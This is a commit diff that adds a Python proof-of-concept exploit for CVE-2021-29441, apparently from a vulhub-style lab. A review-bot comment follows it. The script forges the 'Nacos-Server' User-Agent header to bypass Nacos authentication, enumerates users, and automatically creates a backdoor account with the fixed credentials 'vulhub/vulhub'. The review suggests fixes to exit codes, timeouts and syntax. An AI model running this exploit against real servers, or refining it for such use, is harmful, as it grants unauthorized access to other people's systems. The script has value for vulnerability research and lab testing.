first commit
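--- a/nacos/CVE-2021-29441/poc.py
+++ b/nacos/CVE-2021-29441/poc.py
@@ -0,0 +1,40 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+import sys
+
+import requests
+
+headers = {
+"User-Agent": "Nacos-Server"
+}
+
+
+def check(target):
+endpoint = "/nacos/v1/auth/users?pageNo=1&pageSize=9"
+r = requests.get(target.strip("/") + endpoint, headers=headers)
+if r.status_code == 200 and "pageItems" in r.text:
+print target + " has vulnerabilities"
+return True
+print target + "has not vulnerabilities"
+return False
+
+
+def add_user(target):
+add_user_endpoint = "/nacos/v1/auth/users?username=vulhub&password=vulhub"
+
+r = requests.post(target.strip("/") + add_user_endpoint, headers=headers)
+if r.status_code == 200 and "create user ok" in r.text:
+print "Add User Success"
+print "New User Info: vulhub/vulhub"
+print "Nacos Login Endpoint: {}/nacos/".format(target)
+exit(1)
+
+print "Add User Failed"
+
+
+if __name__ == '__main__':
+if len(sys.argv) != 2:
+print "Please specify the target: python poc.py http://xxxxx:8848"
+exit(-1)
+if check(sys.argv[1]):
+add_user(sys.argv[1])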
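Review bot: The exit status in `add_user` is inverted: the success branch calls `exit(1)` while the "Add User Failed" path falls off the end and the process exits 0, so a wrapper script or CI job cannot tell the two outcomes apart; use `sys.exit(0)` on success and `sys.exit(1)` after the failure message (`sys` is already imported, and the bare `exit` is injected by `site` and is not guaranteed to exist). Both `requests.get` and `requests.post` are called without `timeout=`, so an unresponsive host blocks the script indefinitely; pass a bound such as `timeout=10`. `add_user` runs automatically whenever `check` returns True and leaves a fixed-credential account on the instance, so putting it behind an explicit second argument would keep the default run read-only. `target.strip("/")` also removes leading slashes where `rstrip("/")` is meant, the not-vulnerable message lacks a space before "has", and the `print` statements are Python 2 syntax while the shebang is plain `python`. The page shows the code without its indentation, so the block boundaries referred to here are inferred from the statements.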